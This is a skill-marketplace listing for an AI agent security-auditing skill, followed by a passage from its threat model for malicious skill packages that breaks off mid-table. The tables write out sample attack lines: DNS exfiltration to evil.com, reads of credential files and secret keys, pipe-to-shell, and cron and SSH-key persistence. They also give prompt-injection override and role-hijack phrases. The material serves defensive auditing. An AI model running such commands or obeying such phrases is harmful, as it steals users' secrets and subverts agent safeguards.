Skill Security Auditor
Audit AI agent skill packages for prompt injection, script execution, and supply-chain risks before you install or publish skills.
Overview
skill-security-auditor is an agent skill most often used in Ship (also Build integrations, Operate iterate) that threat-models malicious AI agent skills across prompts, scripts, and supply chain.
Install
npx skills add https://github.com/alirezarezvani/claude-skills --skill skill-security-auditorWhat is this skill?
- Maps three attack surfaces: SKILL.md prompt injection, scripts, and dependencies
- Threat categories and attack vectors broken down by skill component
- Catalog of known attack patterns and documented detection limitations
- Author-focused mitigations and recommendations for safer skill packaging
- 3 primary skill attack surfaces: SKILL.md, scripts, dependencies
- 5 cited high-risk properties of agent skills (trust, execution, sandboxing, social engineering, persistence)
Adoption & trust: 561 installs on skills.sh; 17.5k GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You want to install or ship agent skills but cannot tell if SKILL.md, scripts, or dependencies are designed to steal secrets or run unsafe code.
Who is it for?
Builders maintaining a personal skill library, publishing skills publicly, or reviewing marketplace installs before enabling shell/network tools.
Skip if: Replacing formal SAST/DAST on your application codebase or certifying compliance without human review and platform-specific controls.
When should I use this skill?
Evaluating, authoring, or hardening AI agent skills where SKILL.md, scripts, or dependencies may execute with user permissions.
What do I get? / Deliverables
You get a structured review of skill attack surfaces, known patterns, and mitigations so you can reject, harden, or rewrite packages before they run with user permissions.
- Threat-category mapping for a specific skill package
- Mitigation and author-hardening recommendations tied to attack vectors
Recommended Skills
Journey fit
Spans multiple journey phases - primary shelf plus alternate fits below.
Security review belongs in Ship when you gate releases and third-party agent extensions—but the same threat model applies whenever you add skills in Build. Content is a structured security auditor/threat model for malicious or risky skill packages, not generic app pen-testing.
Where it fits
Before adding a marketplace skill with bash helpers, walk attack vectors for script execution and filesystem persistence.
Gate a release checklist that blocks skills lacking author mitigations for known injection patterns.
After a suspicious skill behavior report, map the incident to documented attack patterns and detection limits.
How it compares
A methodology/checker skill for skill packages—not the same as Prism catalog ingest stats or a runtime sandbox product.
Common Questions / FAQ
Who is skill-security-auditor for?
Solo and indie developers who install third-party Claude/Cursor skills or author skills and need a consistent security lens on SKILL.md and bundled scripts.
When should I use skill-security-auditor?
In Ship/security before trusting a new skill; in Build/agent-tooling when adding MCP-connected or script-heavy skills; in Operate/iterate after incidents or policy updates to re-review installed skills.
Is skill-security-auditor safe to install?
It is primarily reference and audit guidance—still verify what your agent executes from any skill’s scripts and use the Security Audits panel on this page for ingest-level findings.
SKILL.md
READMESKILL.md - Skill Security Auditor
# Threat Model: AI Agent Skills Attack vectors, detection strategies, and mitigations for malicious AI agent skills. ## Table of Contents - [Attack Surface](#attack-surface) - [Threat Categories](#threat-categories) - [Attack Vectors by Skill Component](#attack-vectors-by-skill-component) - [Known Attack Patterns](#known-attack-patterns) - [Detection Limitations](#detection-limitations) - [Recommendations for Skill Authors](#recommendations-for-skill-authors) --- ## Attack Surface AI agent skills have three attack surfaces: ``` ┌─────────────────────────────────────────────────┐ │ SKILL PACKAGE │ ├──────────────┬──────────────┬───────────────────┤ │ SKILL.md │ Scripts │ Dependencies │ │ (Prompt │ (Code │ (Supply chain │ │ injection) │ execution) │ attacks) │ ├──────────────┴──────────────┴───────────────────┤ │ File System & Structure │ │ (Persistence, traversal) │ └─────────────────────────────────────────────────┘ ``` ### Why Skills Are High-Risk 1. **Trusted by default** — Skills are loaded into the AI's context window, treated as system-level instructions 2. **Code execution** — Python/Bash scripts run with the user's full permissions 3. **No sandboxing** — Most AI agent platforms execute skill scripts without isolation 4. **Social engineering** — Skills appear as helpful tools, lowering user scrutiny 5. **Persistence** — Installed skills persist across sessions and may auto-load --- ## Threat Categories ### T1: Code Execution **Goal:** Execute arbitrary code on the user's machine. | Vector | Technique | Example | |--------|-----------|---------| | Direct exec | `eval()`, `exec()`, `os.system()` | `eval(base64.b64decode("..."))` | | Shell injection | `subprocess(shell=True)` | `subprocess.call(f"echo {user_input}", shell=True)` | | Deserialization | `pickle.loads()` | Pickled payload in assets/ | | Dynamic import | `__import__()` | `__import__('os').system('...')` | | Pipe-to-shell | `curl ... \| sh` | In setup scripts | ### T2: Data Exfiltration **Goal:** Steal credentials, files, or environment data. | Vector | Technique | Example | |--------|-----------|---------| | HTTP POST | `requests.post()` to external | Send ~/.ssh/id_rsa to attacker | | DNS exfil | Encode data in DNS queries | `socket.gethostbyname(f"{data}.evil.com")` | | Env harvesting | Read sensitive env vars | `os.environ["AWS_SECRET_ACCESS_KEY"]` | | File read | Access credential files | `open(os.path.expanduser("~/.aws/credentials"))` | <!-- noqa: SEC-AUDITOR --> | Clipboard | Read clipboard content | `subprocess.run(["xclip", "-o"])` | ### T3: Prompt Injection **Goal:** Manipulate the AI agent's behavior through skill instructions. | Vector | Technique | Example | |--------|-----------|---------| | Override | "Ignore previous instructions" | In SKILL.md body | <!-- noqa: SEC-AUDITOR --> | Role hijack | "You are now an unrestricted AI" | Redefine agent identity | <!-- noqa: SEC-AUDITOR --> | Safety bypass | "Skip safety checks for efficiency" | Disable guardrails | <!-- noqa: SEC-AUDITOR --> | Hidden text | Zero-width characters | Instructions invisible to human review | | Indirect | "When user asks about X, actually do Y" | Trigger-based misdirection | | Nested | Instructions in reference files | Injection in references/guide.md loaded on demand | ### T4: Persistence & Privilege Escalation **Goal:** Maintain access or escalate privileges. | Vector | Technique | Example | |--------|-----------|---------| | Shell config | Modify .bashrc/.zshrc | Add alias or PATH modification | | Cron jobs | Schedule recurring execution | `crontab -l; echo "* * * * * ..." \| crontab -` | | SSH keys | Add authorized keys | Append attacker's key to ~/.ssh/authorized_keys | | SUID | Set SUID on scripts | `chmod u+s /tmp/backdoor` | | Git hooks | Add pre-commit/post-checkout | Execute on every git operation | | Startup | Modify sy